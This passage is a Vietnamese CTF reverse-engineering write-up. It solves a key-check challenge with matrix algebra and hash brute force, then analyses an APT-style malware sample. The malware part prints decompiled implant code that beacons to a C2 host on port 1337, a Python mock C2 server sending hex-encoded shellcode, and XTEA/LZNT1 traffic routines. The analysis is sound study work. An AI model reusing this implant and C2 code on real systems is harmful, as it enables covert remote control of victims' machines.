Như vậy ta thấy được rằng hàm check cũng không phải là ăn liền được như ta nghĩ. Vậy hãy đi phân tích lần lượt

Trước hết, ta có thể thấy được rằng độ dài của key phải là 84 nếu không sẽ trả về Wrong

Từ đoạn này có thể thấy, chương trình gán cho biến charset 1 string có 20 kí tự là !_acdefghilmnoprstuwy, tiếp theo đó, nó sẽ duyệt từng kí tự trong chuỗi mà ta nhập vào, nếu như có bất kể 1 tí tự nào không có trong !_acdefghilmnoprstuwy thì chương trình sẽ trả về Wrong. Nói 1 cách đơn giản nhất thì các ký tự của key mà ta nhập vào sẽ nằm trong giá trị của biến charset kia

Tiếp theo, có vẻ như chương trình thực hiện làm gì đó với đầu vào mà ta nhập, nhưng mà đê biết nó làm gì thì ta phải kiểm tra cho chắc chắn

Ở đây ta có thể thấy được là chương trình có làm gì đó với key mà ta nhập vào. Mình vào xem hàm hash_64_fnv1a là gì trước
Hàm hash_64_fnv1a:

Mình thử mò tìm trên github cái hộ số trên kia xem có manh mối gì không, thì kết quả ra được source của hàm trên, nhưng tác giả đã custom nó đi 1 chút. Bạn có thể xem source của hàm mã hóa tại đây
Tiếp tục phân tích, nhìn qua thì mình liên tưởng đến đây là tích của 2 ma trận với nhau với đội lớn lần lượt là [21x21]*[1x21] với hệ số là kết quả của xorshift128() % 1024 với v2. Mà v2 mang giá trị là v9 aka kết quả của hàm hash_64_fnv1a.
Mình vào xem hàm xorshift128 xem có sao. Thì thấy nó sử dụng cái giá trị của các biến x, y, z, w được khai báo ở bên ngoài
Hàm xorshift128:

Mình viết 1 script để gen hết các hệ số ra:
from ctypes import *

x = 0x75BCD15
y = 0x159A55E5
z = 0x1F123BB5
w = 0xDEADBEEF

def xorshift128():
    global x, y, z, w
    t = x
    t ^= t << 11
    t = t & 0xFFFFFFFF
    t ^= t >> 8
    t = t & 0xFFFFFFFF
    x = y
    y = z
    z = w
    w ^= w >> 19
    w = w & 0xFFFFFFFF
    w ^= t
    return w

for i in range(0, 0x15):
    for j in range(0, 0x15):
        tmp = c_int(xorshift128())
        hso = tmp.value & 0x3ff
        if tmp.value < 0:
            hso = -(1024 - hso)
        print(hso,end= ", ")

Hệ số(ma trận [21x21]):
842, -198, 778, -259, -73, -935, 739, 703, 595, 906, -888, -669, -616, 983, 136, 565, 413, -797, 802, 534, -122, 612, -180, -903, 57, 672, -406, 326, -328, -328, 169, -626, -196, 571, 519, -156, 649, 890, 616, 662, -239, 121, 812, 273, -766, 562, 694, 1004, -91, 872, -13, 8, -425, 603, -65, -142, -254, -757, 812, -648, 325, 877, 587, -351, 237, 242, -748, 364, 508, -988, -591, -871, 242, -220, 755, 373, -329, -462, 906, 636, 132, -65, 20, 655, -332, -335, -311, 593, -724, 540, -298, 951, 671, 117, 431, 156, 276, -51, 482, 667, 987, -735, -420, -449, -292, -609, -261, -928, -151, -68, -939, -550, -592, 924, 93, -529, -179, -68, -323, -848, -757, 767, 504, -58, -48, -382, 611, -196, -877, 292, -788, 520, 866, 639, 583, 610, 895, 456, -625, -993, 633, -940, 496, 942, 944, 999, 417, 383, -595, 712, -138, -878, 488, -740, -135, -854, 145, -416, 280, 638, 249, 292, 575, -166, 808, -309, -544, -769, 536, 378, 8, -504, 685, -899, 778, 48, -468, -414, -369, 40, 684, -848, -171, 186, 312, -831, -34, -591, -891, 0, -313, 278, -358, 674, -495, -946, 145, -1012, 147, 651, 178, -1019, 490, 840, -557, 141, -408, -917, -444, 825, -1016, 713, -36, 668, 1013, -724, -1005, -395, 935, -933, 625, -257, -852, 1003, 137, 69, -794, -712, -83, 913, 1018, -700, 221, 507, -382, -42, -520, -398, 156, 656, -637, -67, -946, 818, 535, 1005, 957, -803, -937, 23, 774, 34, 49, -80, -247, -543, 128, -986, -311, 718, 513, -640, -124, 593, -376, -428, 134, -699, 929, -611, -866, -13, 992, -335, 672, -462, -366, -663, 392, 928, -20, -572, -237, -697, 854, 146, 922, 764, 402, 993, 243, -857, -362, 620, -74, -758, 535, 210, 372, -888, 633, -134, 657, -203, -245, -844, -562, 519, 589, -908, -111, 855, 986, 535, 782, -638, -618, 94, 33, -668, 102, -869, 135, -135, 267, -439, 620, -408, -832, -688, 893, 937, 630, 536, -213, 214, -460, -596, -141, 640, 547, 854, -984, -806, -1017, 812, -366, 72, 1000, -467, 579, -84, 269, 175, -846, -879, -356, -739, 529, -545, -1014, -714, 181, 840, -787, 57, -86, 344, 599, -996, 694, -627, 606, 768, -492, -352, 355, 333, -748, -606, -176, 153, -926, 778, -716, 175, 978, 514, 669, -368, -194, 723, -897, -78, 370, -271, -616, 123, -184, -341, -818, -502, 660, -856, -675, 359, 855, 151, 594, -521, -768, -866, 44, 637, -282, -998, 919, -370, -427, 829, -865, -727, -121, 464, 436, -1004, 943, -62, -239, -796, -806, -930, 811, 301, -138, -371, 175, 684, -31, -446, 975

Sau khi có được hệ số và có được ma trận check bên dưới thì mình sử dụng sage để tính toán các giá trị của ma trận [1x21]
X = [[842, -198, 778, -259, -73, -935, 739, 703, 595, 906, -888, -669, -616, 983, 136, 565, 413, -797, 802, 534, -122], [612, -180, -903, 57, 672, -406, 326, -328, -328, 169, -626, -196, 571, 519, -156, 649, 890, 616, 662, -239, 121], [812, 273, -766, 562, 694, 1004, -91, 872, -13, 8, -425, 603, -65, -142, -254, -757, 812, -648, 325, 877, 587], [-351, 237, 242, -748, 364, 508, -988, -591, -871, 242, -220, 755, 373, -329, -462, 906, 636, 132, -65, 20, 655], [-332, -335, -311, 593, -724, 540, -298, 951, 671, 117, 431, 156, 276, -51, 482, 667, 987, -735, -420, -449, -292], [-609, -261, -928, -151, -68, -939, -550, -592, 924, 93, -529, -179, -68, -323, -848, -757, 767, 504, -58, -48, -382], [611, -196, -877, 292, -788, 520, 866, 639, 583, 610, 895, 456, -625, -993, 633, -940, 496, 942, 944, 999, 417], [383, -595, 712, -138, -878, 488, -740, -135, -854, 145, -416, 280, 638, 249, 292, 575, -166, 808, -309, -544, -769], [536, 378, 8, -504, 685, -899, 778, 48, -468, -414, -369, 40, 684, -848, -171, 186, 312, -831, -34, -591, -891], [0, -313, 278, -358, 674, -495, -946, 145, -1012, 147, 651, 178, -1019, 490, 840, -557, 141, -408, -917, -444, 825], [-1016, 713, -36, 668, 1013, -724, -1005, -395, 935, -933, 625, -257, -852, 1003, 137, 69, -794, -712, -83, 913, 1018], [-700, 221, 507, -382, -42, -520, -398, 156, 656, -637, -67, -946, 818, 535, 1005, 957, -803, -937, 23, 774, 34], [49, -80, -247, -543, 128, -986, -311, 718, 513, -640, -124, 593, -376, -428, 134, -699, 929, -611, -866, -13, 992], [-335, 672, -462, -366, -663, 392, 928, -20, -572, -237, -697, 854, 146, 922, 764, 402, 993, 243, -857, -362, 620], [-74, -758, 535, 210, 372, -888, 633, -134, 657, -203, -245, -844, -562, 519, 589, -908, -111, 855, 986, 535, 782], [-638, -618, 94, 33, -668, 102, -869, 135, -135, 267, -439, 620, -408, -832, -688, 893, 937, 630, 536, -213, 214], [-460, -596, -141, 640, 547, 854, -984, -806, -1017, 812, -366, 72, 1000, -467, 579, -84, 269, 175, -846, -879, -356], [-739, 529, -545, -1014, -714, 181, 840, -787, 57, -86, 344, 599, -996, 694, -627, 606, 768, -492, -352, 355, 333], [-748, -606, -176, 153, -926, 778, -716, 175, 978, 514, 669, -368, -194, 723, -897, -78, 370, -271, -616, 123, -184], [-341, -818, -502, 660, -856, -675, 359, 855, 151, 594, -521, -768, -866, 44, 637, -282, -998, 919, -370, -427, 829], [-865, -727, -121, 464, 436, -1004, 943, -62, -239, -796, -806, -930, 811, 301, -138, -371, 175, 684, -31, -446, 975]]
Y = [-622472985781, 443256199922, 4804862013484, -1990292653755, 1716071043623, 2612697655413, 2853361699824, -8094556971432, -1289445257418, -1552556399857, 6101836644339, -3508582733213, -1821100477986, -6183692404382, -581895255209, 311783905729, -1403558929228, 948885246100, 3711633763399, -1222346925610, -2460365508509]

X = matrix(ZZ, X)
Y = vector(Y)
A = X.solve_right(Y)

assert X*A == Y
print(A)


Sau khi tính toán được thì ta có kết quả của ma trận [1x21] như sau:
-831904645, 842869369, -1872719316, 1874430657, 1643673264, 842869369, -224886681, 51900271, 1261422793, 1041996681, 1470239221, -532720492, -1467227862, -288608497, -1819333551, -356927857, -47355757, -1525362217, 2055041019, -986512317, 72314917

Việc cuối cùng của ta bây giờ là brute-force dựa trên charset đã có, vì hàm hash_64_fnv1a có sẵn trong python rồi nên ta không phải code lại nó nữa mà chỉ việc gọi nó ra thôi
from ctypes import *
from fnvhash import fnv1a_64

charset = b"!_acdefghilmnoprstuwy"

check = [-831904645, 842869369, -1872719316, 1874430657, 1643673264, 842869369, -224886681, 51900271, 1261422793, 1041996681, 1470239221, -532720492, -1467227862, -288608497, -1819333551, -356927857, -47355757, -1525362217, 2055041019, -986512317, 72314917]

for i in range(21):
    for a in charset:
        for b in charset:
            for c in charset:
                for d in charset:
                    if c_int32(fnv1a_64((chr(a) + chr(b) + chr(c) + chr(d)).encode())).value == check[i]:
                        print(((chr(a) + chr(b) + chr(c) + chr(d)).encode()).decode(),end="")

#may_the_lanterns_of_the_lunar_new_year_light_up_your_path_to_success_and_happiness!!


Advanced Persistent Threat
Trước tiên mình xem thư mục Sample trước, thấy có 1 con PE và 1 con DLL. Mình xem con PE trước thì nó chỉ có 3 hàm, và nó gọi 1 hàm tên là ServiceCtrMain
Trong con PE:

Trong con DLL:

Hàm sub_10001060:

Hàm sub_1000110D:


Hàm sub_1000110D là mã hóa RC4, 1 loại mã hóa đối xứng phổ biến, bạn có thể xem mã nguồn của nó ở bất kì đâu trên github hoặc tại đây
Mình thấy ở đây, nó mở file AmMonitoringProvider.mof rồi decrypt, thì ta để ý ở đây, biến v1 được gán cho giá trị trả về của hàm sub_10001060 mà giá trị của hàm sub_10001060 trả về lại là địa chỉ của 1 vùng nhớ nào đó. Mình quyết định nhảy tới xem nó là gì. Thì nó lại jump tới 1 địa chỉ khác. Tại địa chỉ đó có 1 hàm check signature của 1 file nào đó (khả năng cao là 1 con dll khác).

Nên mình quyết định phân tích tiếp từ đó, ở ngay bên trên đó có 1 đoạn base64 trông khá là khả nghi, mình thử decode thì nó ra như này :D




Okay, giờ tiếp tục phân tích hàm có đoạn check signature, mình debug 1 hồi, thì thấy các hàm được call ở kia không quan trọng lắm, cho đến khi mình thử debug qua đoạn biến v30 thì bị crash, mình tiến hành thử debug lại xem nó crash ở đoạn nào

Khi mình cho chương trình chạy qua hàm sub_E42AA2, thì chương trình vẫn không sao, vậy thì hàm sub_E428C2 sẽ khiến ta bị crash. Mình tiến hành đi vào trong hàm đó phân tích tiếp

Thì ở trong hàm sub_E41CE6 có 1 thứ khá thú vị như sau

Nó lại gọi lại 1 hàm giống như hàm LineDDA như ở bên ngoài 1 lần nữa, đây là lý do làm cho ta bị crash. Mình lại vào đó để phân tích hàm sub_E41D4B


Nên mình quyết định dump ra 1 con dll mới đế tiến hành debug tiếp cho tiện, vì flow trước đó cũng chỉ có vậy.
Con dll được dump ra:



Trông đống array kia giống như 1 struct, nên mình tạo struct trước, debug, và qua nhiều lần thì mình có tạo struct cho dễ nhìn như sau
void __stdcall __noreturn Proc(int a1, int a2, LPARAM a3)
{
  struc_1 *v3; // edi
  struc_2 *v4; // edx
  int v5; // eax
  _DWORD *v6; // esi
  _DWORD *v7; // eax
  char *v8; // [esp-Ch] [ebp-5Ch] BYREF
  size_t v9; // [esp-8h] [ebp-58h]
  struc_1 v10; // [esp+10h] [ebp-40h] BYREF
  void *Block; // [esp+30h] [ebp-20h]
  const void *v12[6]; // [esp+34h] [ebp-1Ch] BYREF
  int v13; // [esp+4Ch] [ebp-4h]

  if ( !pAPI )
  {
    v10.memset = (int)memset;
    v3 = (struc_1 *)operator new(0x1Cu);
    v10.memcpy = (int)memcpy;
    v10.malloc = (int)malloc;
    pAPI = (int)v3;
    v10.GetProcAddress = (int)GetProcAddr;
    v10.send = (int)SeemLikeSend;
    v10.___ = 0;
    v10.free = (int)free;
    qmemcpy(v3, &v10, sizeof(struc_1));
  }
  if ( !pHOST )
  {
    v4 = (struc_2 *)operator new(0x24u);
    Block = v4;
    memset(v4, 0, sizeof(struc_2));
    v4->host = (int)"totally-not-malicious-host.local";
    v4->port = 1337;
    v5 = pAPI;
    v4->connecting = 0;
    v4->field_8 = 0;
    v4->field_C = 0;
    v4->XTEAenc = 0;
    v4->XTEAdec = 0;
    v4->LZNTenc = 0;
    v4->LZNTdec = 0;
    v4->pAPT = v5;
    pHOST = v4;
  }
  if ( !dword_74CD7520 )
  {
    v6 = operator new(8u);
    Block = v6;
    v13 = 0;
    v9 = 24;
    *v6 = 0;
    v6[1] = 0;
    v7 = operator new(v9);
    v13 = -1;
    *v7 = v7;
    v7[1] = v7;
    v7[2] = v7;
    *((_WORD *)v7 + 6) = 257;
    *v6 = v7;
    dword_74CD7520 = (int)v6;
  }
  while ( 1 )
  {
    if ( (unsigned __int8)check_connection() )
    {
      while ( pHOST->connecting )
      {
        Sleep(0xAu);
        memset(v12, 0, 12);
        sub_74CD1467(v12);
        v13 = 1;
        sub_74CD23AC((int *)&v8, v12);
        sub_74CD1E9F(v8, (char *)v9);
        v13 = -1;
        sub_74CD16B7(v12);
      }
    }
    Sleep(0x7530u);
  }
}

Vì có hàm check_connection, tức là ta sẽ phải tiến hành gửi data thì ta mới tiếp tục debug được. Mình mô phỏng lại quá trình mình gửi gói tin như sau
import socket

def handle_client(client_socket):
    # Sequence of messages to send
    messages = [
        "bebafeca0e0000000461647661706933322e646c6c00",
        "bebafeca79020000010000000050010000558bec83ec14837d0c005356570f842f0100008b7d1485ff0f84240100008b45108bc88d50188955fc83e107760cb8080000002bc103d08955fc8b451839100f82fd0000008b7508526a00578b460cffd0ff75108b46108d5f18ff750c895d0853ffd08b0683c41868ac6f920268bc99e10effd085c00f84c60000006a108d4dec51ffd08b45fc83c0e803c389450c3bd8736a8b3333c08b7b048d58400f1f008bd78bcfc1e104c1ea0533d18bc883e10303d78b4c8dec03c82d4786c86133d103f28bd68bcec1e104c1ea0533d18bc8c1e90b03d683e1038b4c8dec03c833d103fa83eb0175b98b5d088933897b0483c308895d083b5d0c72998b7d148b45108947048b45ec3541455458c707414554588947088b0f8b45f0354145545889470c8bc13345f4334df8894f148b4d188947108b45fc5f5e8901b0015b8be55dc214005f5e32c05b8be55dc21400cccccc558bec8b4d0c83ec14535685c90f84f80000008b5d1485db0f84ed0000008b45108d50e8f6c2070f85de0000008b451839100f82d30000008b3181fe414554580f85c50000003951040f87bc0000008b410833c68945ec8b410c33c68945f08b411033c68945f48b411483c11833c6894d108945f88d04118945fc3bc87377578b01be406ede8d8903bb400000008b79048bd08bc8c1e104c1ea0533d18bcec1e90b03d083e1038b4c8dec03ce81c64786c86133d12bfa8bd78bcfc1e104c1ea0533d18bce83e10303d78b4c8dec03ce33d12bc283eb0175b88b5d148b4d1083c108894d108903897b0483c308895d143b4dfc728b5f8b450c8b4d185e5b8b40048901b0018be55dc214005e32c05b8be55dc21400cccccccccccccccccccccc",
        "bebafeca28000000414554580b00000001fb78a72167016c973955e4162d0c6a8724fcfccb3d122158ff757d46772101",
        "bebafeca580100004145545839010000b54fb16fb069d5f6aa74bfce1e7acadfff39c559031103c32d29296582588c894d17fc54eaf5d75e634b48c52a37fa1692c135b8ec566eada9b292ee81b7f96ecc2bd0006935b5561d0f487fb0449f2a7195c5a5cfa3e381a949f62f49f58eabfd959aa0b33589f58f4932dc0032ad91e0ed74b83c07d5dbce2312d333f5ab2fe12ce4386bd7614a7e10220bce11f5cfbab18a03ddac1e01968da4c488c06e20131a953235e0267d85b5a773142500a002826633c6977d018f8b085f327c7f38d1d59838e891e7cf1779cacca0ce5f6df615ee5202e242f3b0a94a5102ac4c984c9723b52a4f03405fdfd3883d11e3a02b65dd5c4195a4dbc543405663a59b44c3c1a87168d883005d70325fbeaeb9aef25dab01198a5146d396a68794e0290ac6d77bff051916f57a01b0e6fc995322ea57fd5a429709b2ea42737e22162cb84c9723b52a4f03405cde09ebfefc5628",
        "bebafeca3000000041455458140000000fea624ac93abb804b4a97254af779a8804db01a96fce8c5af4e0a9e09c3a50c06b9f8596f296075",
        "bebafeca30000000414554581400000035ab9bdf6a0556fddd0c3cafa03d320dd0a52d3f7c3f4b69d10dde2b96cd65fdb14905e21f659937",
        "bebafecae804000041455458cb040000557f5fc8a5d8ee06232f1ce068e0d2e4da0a9c094328183490bfa7d4b8f994c8b059eda20c72fac325cd1bb4a5bcb180c8d68b9e291b44da1ffefe585f8fef243cc81ae887615daea121e53c82c1b0d0a0684c05845ceb86c20226f12a5745d07eb697aa342c6825cd1b26c7414595acb078b3e95f6c11a659bebc075060f7400ad1d77b3c9f72c7c5e8668fef29f0a992407bb1f61666f8247df4e24ddeb7c6b1c531f58e14ad8de9f6961b40f4b13abd2dea746286f2d9ab21a0a22f79963ab078b3e95f6c11a659bebc075060f7400ad1d77b3c9f72c76ae6203b9de7d25aa8d996a003fd555c801ad904dc8b5145b1c531f58e14ad8de9f6961b40f4b13a8390dce88595215d9fc3f6a53e7e5dc4a1ae436e7194fa171d10675958f449a5bdd72c6e6b4112cf971cdc6c74e4f7d0a1820da3b327e3e95862a4d9ae0da97a98ff9c181d2d2a73f90744cb89b6e9bcd5e617961b8dfa799803fcc2525bd4ee480a4c85dfc9a7b1a415a91934db613f75365189c660d89fff78ee265334adf7096fdd9299b74150dd57a911d42b889d1f344ef0bbd8cc18f05089f5fa895bc2127e9ffc4cb04e3fe9dffc51afa0dc2492200013647b680d4423a12d94d482be92d6d5e8a08158d723392c359e1a988c120766523b0240d21e07e4cb7d4c4736d88fada37ee0f722ed4c998f842fbddbae1aa78b315fca7ab3f205ebcf9d9425b86eae94cb1f8233171c833e37bef32a440a7978921e57803878702132a88d1a6fed972f626a43cb8ed0ef500e5eee420255c617908f0a97a5110529f7ea48a511b667453d8bc0ea589c2c5cb11a759487838046c0e4b04eb39a11d297970bbdd5b9a5dcc196395cc59bf840a48134b4ba4ab7c3e53d78d3b4a3df8c3c9d7cbfecda338b51ea6210809dee80235d053bdecab9b98dde65df447269613290c780a91e3aa45e50aed5a48fccdf1b25ae83fabd889f4ae5cbf9a753173a0dcda48b8b5e6fef704dafc40912de96a0d9449da55c1711d1c7ced7aee913afcaed4b21e7cc286a80a9fc9000e0ed48d29a62d9a8214391ecc92723bc33f36acecd2959c542bf7290275fd107507d298aa79e5c1b12b140cca7fc696183115473667b1bca08c1ce82ed83e38dc26da9458770e178b41229cb349fce26bbf7c3819eb0e95390dac738a575e9b0ca184ae8cd5f444c3b6a906d6e99b79b09b1c07f0c5988e43307d9bd1ad5ebf5e7871c97d0f6b23fd1bf84968b608436fedf13b674e668e7f61d385164fba436d1169a58129106748398868507b9a00c9071a91eea08891fca5de6e871f9b928351be45d4650771f85d778b002cd840558204e98f5f9777cf9c6d967fdf7bb4355978e523d682d17b6e5b1fdec5cee68c17f0af81e263200089838ce6fd2f116fedd01a900932d960107eef590a06c5b4252c041fbb131d653c07a4a11e26fbbf968baff1b1e081cbc6579e9b54a367483a9d87194ef2603c797c8ad913a40ca4bde0abdbecffd26d46014981a623a0386467bb9aca3bda464af2c8df9bfefad94d7e79cc97cba419a84594171829ac12a411856c1f2e28aee09848a6e2234dce3340fdeb1c03d9b4343886cdbd91601c2e4830e4607bd97062b92b2c1927ced3c39729f20eeae41e8c0c7ae32613a9081c71edfd5f2528dd9cd8b56a352212f251d12b34085f812adbc8bb919d29b298d21a9570c21eb34cfa218051b5bd5fb8078b125b31bfa703c067e57b0bc9896072bd75436c715",
        "bebafeca28000000414554580c000000a3a12c0401f558f0759f7c50a64c6f666a7c7dcd42251c4d8bbbc5e8cd02bdef",
        "bebafeca28000000414554580c000000d5142bbf3005d1d1ddd2185c6e4c3f92195a4ddfc763c88398fdb87df9e654cc",
        "bebafeca58000000414554583d00000044695bc5a9e71e0b4a95a72643b607059e25b0f139d4eab186ed8d56bfd9c458662db2e3fb5a8b5f6db44143c092d9a0b911d798eab2a2d30c8eabd811189fe83b55efdf40aba58724f9bd065e7c4dd0",
    ]
    message_index = 0

    while message_index < len(messages):
        messagehex = messages[message_index]
        message = bytes.fromhex(messagehex)
        client_socket.send(message)
        print(f"Sent message: {messagehex}")
        message_index += 1

        # Receive response
        response = client_socket.recv(1024)
        print(f"Received response: {response.hex()}")

    client_socket.close()

def main():
    server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    server_socket.bind(('0.0.0.0', 1337))
    server_socket.listen(1)

    print("Server is listening for incoming connections...")

    while True:
        client_socket, addr = server_socket.accept()
        print(f"Accepted connection from: {addr}")
        handle_client(client_socket)

if __name__ == "__main__":
    main()

Các biến messages ở kia là data được gửi từ port 1337 như mình thấy trong chương trình, nhưng trước khi cho chay, ta phải cho client nhận diện được server. Ta sẽ phải thêm host như sau

Cách hoạt động của việc trao đổi qua lại các gói tin và cách thức file được mã hóa
Mình sẽ chia các gói tin thành 4 loại:

Cái gì đó mình cũng không rõ lắm: Nhưng trông như load lib và mem

Shellcode: Shellcode cho việc mã hóa, mỗi gói tin shellcode sẽ bao gồm cả hàm mã hóa và hàm giải mã. Mỗi khi shellcode mã hóa được load vào, các gói tin sau sẽ sử dụng hàm mã hóa và giải mã đã được load vào để phục vụ cho việc trao đổi

Request: Yêu cầu gì gửi cái đó, sau khi các gói tin shellcode được gửi lên hết

File + key dùng cho việc mã hóa: Do phân tích mình thấy nó sử dụng key, và trông nó giống với mã hóa dòng khi đọc src. Thêm với việc mình dùng ciphertext + key cho chạy qua hàm mã hóa thì ra được plaintext, giống với RC4 nên mình để tên nó là RC4 cho dễ gọi
 


Luồng chạy cơ bản của chương trình
Chương trình sẽ gửi các gói tin có dạng như bebafeca28000000414554580b00000001fb78a72167016c973955e4162d0c6a8724fcfccb3d122158ff757d46772101. Sau khi nhận được data, chương trình sẽ kiếm tra xem có đúng định dạng của gói tin hay không qua signature là 0xCAFEBABE

Tiếp theo chương trình sẽ lấy size của đoạn data không tinh 4 byte signature và 4 byte chỉ đổ lớn

Và đoạn recv cuối cùng sẽ lấy đoạn data sau cùng trông như này

Sau khi chia ra được 3 phần như vậy rồi. Chương trình sẽ tiền hành giải mã gói tin(tùy thuộc vào thời điểm gói tin được gửi. Như trong trường hợp này thì chỉ giải mã XTEA).

Tiến hành giải mã xong, chương trình sẽ cấp phát 1 vùng nhớ để chứa địa chỉ được gán cho data mà mình vừa nhận được thông qua hàm sau(Nói chung hàm này mình không thấy nó có gì quan trọng lắm)

Sau đó chương trình thực hiện quá trình xử lý để gửi đi. Ở trong hàm này có 5 option cho ta chọn

Tùy vào mỗi gói dữ liệu khác nhau sẽ nhảy vào các option khác nhau.
Tiến hành mã hóa, add size, add signature và gửi trả

Tiến hành mã hóa các kiểu

Add size, add signature và gửi đi
Phân tích các gói tin

Gói tin thứ 1, có nội dung là advapi32.dll. Đây là loại 1 mình đã phân loại
Tiếp theo chương trình đi vào hàm xử lý để trả về cho host

Ở đây chương trình chạy vào option số 4 cho ta để dữ liệu được trả về, do ở đây ta chưa load shell mã hóa nên ta gửi gì thì nhận lại cái đó

Gói tin thứ 2 là shellcode của mã hóa XTEA, bao gồm cả thuật toán mã hóa và giải mã
Thuật toán mã hóa được dùng để mã hóa khi gửi gói tin đi:
char __stdcall sub_A72FE1(int a1, int a2, int a3, _DWORD *a4, unsigned int *a5)
{
  int *v5; // edi
  unsigned int v6; // edx
  int v7; // ecx
  unsigned int *v9; // ebx
  void (__stdcall *v10)(int *, int); // eax
  unsigned int v11; // esi
  unsigned int v12; // eax
  unsigned int v13; // edi
  int v14; // ebx
  unsigned int v15; // ecx
  int v16; // eax
  int v17; // ecx
  int v18; // eax
  int v20[4]; // [esp+Ch] [ebp-14h] BYREF
  unsigned int v21; // [esp+1Ch] [ebp-4h]
  unsigned int *v22; // [esp+28h] [ebp+8h]
  unsigned int v23; // [esp+2Ch] [ebp+Ch]

  if ( !a2 )
    return 0;
  v5 = a4;
  if ( !a4 )
    return 0;
  v6 = a3 + 24;
  v21 = a3 + 24;
  v7 = a3 & 7;
  if ( (a3 & 7) != 0 )
  {
    v6 += 8 - v7;
    v21 = v6;
  }
  if ( *a5 < v6 )
    return 0;
  (*(void (__thiscall **)(int, _DWORD *, _DWORD, unsigned int))(a1 + 12))(v7, a4, 0, v6);
  v9 = a4 + 6;
  v22 = a4 + 6;
  (*(void (__cdecl **)(_DWORD *, int, int))(a1 + 16))(a4 + 6, a2, a3);
  v10 = (void (__stdcall *)(int *, int))(*(int (__stdcall **)(int, int))a1)(249665980, 43151276);
  if ( !v10 )
    return 0;
  v10(v20, 16);
  v23 = (unsigned int)a4 + v21;
  if ( v9 < (_DWORD *)((char *)a4 + v21) )
  {
    do
    {
      v11 = *v9;
      v12 = 0;
      v13 = v9[1];
      v14 = 64;
      do
      {
        v15 = v12 + v20[v12 & 3];
        v12 -= 1640531527;
        v11 += v15 ^ (v13 + ((16 * v13) ^ (v13 >> 5)));
        v13 += (v12 + v20[(v12 >> 11) & 3]) ^ (v11 + ((16 * v11) ^ (v11 >> 5)));
        --v14;
      }
      while ( v14 );
      *v22 = v11;
      v22[1] = v13;
      v9 = v22 + 2;
      v22 = v9;
    }
    while ( (unsigned int)v9 < v23 );
    v5 = a4;
  }
  v5[1] = a3;
  v16 = v20[0] ^ 'XTEA';
  *v5 = 'XTEA';
  v5[2] = v16;
  v17 = *v5;
  v5[3] = v20[1] ^ 'XTEA';
  v18 = v20[2] ^ v17;
  v5[5] = v20[3] ^ v17;
  v5[4] = v18;
  *a5 = v21;
  return 1;
}

Thuật toán dùng để giải mã khi nhận gói tin và đọc:
char __stdcall sub_A73131(int a1, _DWORD *a2, int a3, unsigned int *a4, unsigned int *a5)
{
  unsigned int *v5; // ebx
  unsigned int v6; // edx
  unsigned int *v7; // ecx
  unsigned int v8; // eax
  unsigned int v9; // esi
  int v10; // ebx
  unsigned int v11; // edi
  unsigned int v12; // ecx
  int v14[4]; // [esp+8h] [ebp-14h]
  unsigned int v15; // [esp+18h] [ebp-4h]
  unsigned int v16; // [esp+2Ch] [ebp+10h]

  if ( !a2 )
    return 0;
  v5 = a4;
  if ( !a4 )
    return 0;
  v6 = a3 - 24;
  if ( (((_BYTE)a3 - 24) & 7) != 0 || *a5 < v6 || *a2 != 'XTEA' || a2[1] > v6 )
    return 0;
  v14[0] = a2[2] ^ 'XTEA';
  v14[1] = a2[3] ^ 'XTEA';
  v14[2] = a2[4] ^ 'XTEA';
  v7 = a2 + 6;
  v16 = (unsigned int)v7;
  v14[3] = a2[5] ^ 'XTEA';
  v15 = (unsigned int)a2 + v6 + 24;
  if ( v7 < (unsigned int *)((char *)v7 + v6) )
  {
    do
    {
      v8 = *v7;
      v9 = -1914802624;
      *v5 = *v7;
      v10 = 64;
      v11 = v7[1];
      do
      {
        v12 = v9 + v14[(v9 >> 11) & 3];
        v9 += 1640531527;
        v11 -= v12 ^ (v8 + ((16 * v8) ^ (v8 >> 5)));
        v8 -= (v9 + v14[v9 & 3]) ^ (v11 + ((16 * v11) ^ (v11 >> 5)));
        --v10;
      }
      while ( v10 );
      v16 += 8;
      v7 = (unsigned int *)v16;
      *a4 = v8;
      a4[1] = v11;
      v5 = a4 + 2;
      a4 += 2;
    }
    while ( v16 < v15 );
  }
  *a5 = a2[1];
  return 1;
}

Trong hàm xử lý để gửi trả phản hồi, chương trình chạy vào option số 1. Thêm với việc thực hiện mã hóa XTEA vừa được load để mã hóa kết quả rồi gửi lại phản hồi cho host. Trong hàm nãy lấy key ngẫu nhiên từ hàm cryptbase_SystemFunction036

Khi nhận được gói tin thứ 3, trước hết chương trình sẽ tiến hành giải mã, vì ở gói tin trước ta đã load shellcode thực hiện giải mã XTEA khi nhận gói tin và mã hóa XTEA khi gửi, nên chương trình sẽ giải mã nó ra cho ta đọc trước rồi mới tiến hành tuần tự như gói tin trước.

Dữ liệu sau khi được giải mã

Gói tin thứ 4 lại là shellcode, lần này chứ thuật toán mã hóa và giải mã LZNT1
Mã hóa LZNT1
char __stdcall sub_DD3A89(int (__stdcall **a1)(int, int), int a2, int a3, _DWORD *a4, _DWORD *a5)
{
  int (__stdcall **v5)(int, int); // esi
  int (__stdcall *v6)(int, int, int, _DWORD *, int, int, int *, int); // ebx
  int (__stdcall *v7)(int, int (__stdcall ***)(int, int), char *); // eax
  int v8; // eax
  int v9; // edi
  _DWORD *v11; // ecx
  char v12[4]; // [esp+Ch] [ebp-8h] BYREF
  int v13; // [esp+10h] [ebp-4h] BYREF

  v5 = a1;
  v6 = (int (__stdcall *)(int, int, int, _DWORD *, int, int, int *, int))(*a1)(0x37AC0DEC, 0x4A1C450C);
  v7 = (int (__stdcall *)(int, int (__stdcall ***)(int, int), char *))(*v5)(0x37AC0DEC, 0x8FC8E20);
  if ( !v6 )
    return 0;
  if ( !v7 )
    return 0;
  if ( v7(258, &a1, v12) >= 0x8000000 )
    return 0;
  v8 = ((int (__cdecl *)(int (__stdcall **)(int, int)))v5[5])(a1);
  v9 = v8;
  if ( !v8 )
    return 0;
  if ( v6(258, a2, a3, a4 + 1, *a5 - 4, 4096, &v13, v8) >= 0x8000000 )
  {
    ((void (__cdecl *)(int))v5[6])(v9);
    return 0;
  }
  v11 = a5;
  *a4 = 'LZNT';
  *v11 = v13 + 4;
  ((void (__cdecl *)(int))v5[6])(v9);
  return 1;
}

Hàm giải mã
char __stdcall sub_DD3B59(int (__stdcall **a1)(int, int), _DWORD *a2, int a3, int a4, _DWORD *a5)
{
  _DWORD *v5; // esi
  int (__stdcall *v6)(int, int, _DWORD, _DWORD *, int, _DWORD **); // eax
  _DWORD *v7; // ecx
  _DWORD *v8; // esi

  v5 = a2;
